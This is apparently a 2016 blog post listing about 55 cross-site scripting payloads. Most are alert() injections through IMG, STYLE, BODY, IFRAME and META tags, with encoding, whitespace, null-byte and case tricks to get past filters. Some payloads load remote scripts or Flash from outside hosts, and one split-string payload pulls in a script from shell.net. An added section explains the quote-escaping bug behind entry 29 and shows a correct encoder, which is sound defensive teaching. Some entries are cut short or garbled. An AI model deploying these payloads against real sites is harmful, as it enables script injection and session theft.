XSS attack roundup

Posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(99) Other ways to pop a dialog
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using the JavaScript directive
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no quotes and no semicolon
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (the semicolons are required here)
<IMG SRC=javascript:alert(&quot;XSS&quot;)>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode (decimal entity) encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) Long 7-digit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab splitting the JavaScript directive (a literal TAB character between jav and ascript)
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab splitting the JavaScript directive
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injected JavaScript, one character per line; an extreme XSS example
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>

(16) Working around a character limit (all fragments must land on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null byte
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte 2. Null bytes are basically ineffective domestically, since there is nowhere to exploit them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" &#14;  javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2 (protocol-relative source)
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS (no closing angle bracket)
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Bypassing a quote-escaping filter inside a JavaScript string
\";alert('XSS');//
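Entry (29) works because the template escapes the double quote but not the backslash: the attacker's backslash swallows the one the filter inserts, and the quote that follows closes the string. The block below is an added example, not code from the original post. It builds the inline script the way a server template would, once with that broken encoder and once with a proper JavaScript string encoder, then executes the result with a stubbed alert() to show which one runs attacker code. The function names and the sample input are constructed for the example; it runs under Node.

```javascript
// Added example, not part of the original post: the template bug behind
// entry (29). Inputs are constructed; runs under Node.

// Broken encoder: only the double quote is escaped, backslashes pass through.
function brokenQuoteEscape(userInput) {
  return '"' + userInput.replace(/"/g, '\\"') + '"';
}

// Correct encoder for data that ends up inside a <script> block:
// JSON.stringify escapes quotes, backslashes and control characters; the extra
// replacements keep "</script>" and the U+2028/2029 line terminators from
// ending the block or the statement early.
function jsStringLiteral(userInput) {
  return JSON.stringify(userInput)
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Build the inline script the way a server template would and execute it with
// a stubbed alert(), standing in for the browser parsing the <script> block.
// Returns the generated script, whether attacker code ran, and the value the
// variable ended up holding.
function renderAndRun(encode, userInput) {
  const calls = [];
  const script = "var name = " + encode(userInput) + "; return name;";
  const run = new Function("alert", script);
  const returned = run((msg) => calls.push(String(msg)));
  return { script, alerted: calls.length > 0, returned };
}

// The payload from entry (29), as a JavaScript string: \";alert('XSS');//
const PAYLOAD_29 = "\\\";alert('XSS');//";

// Side-by-side result for the two encoders on the same input.
function demo() {
  return {
    broken: renderAndRun(brokenQuoteEscape, PAYLOAD_29),
    fixed: renderAndRun(jsStringLiteral, PAYLOAD_29),
  };
}
```

With the broken encoder the generated source is `var name = "\\";alert('XSS');//"; return name;`: the literal `"\\"` is a complete string, `alert('XSS')` runs as a statement, and the rest of the line is commented out. With the JSON-based encoder the whole input stays inside the string and is returned unchanged.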
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY ONLOAD=alert('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh with an additional URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character inserted before the directive (any of 1-32, 34, 39, 160, 8192-8, 13, 12288, 65279 works)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression split by a comment
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything that opens with an angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression (only the tail of this entry survives)
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
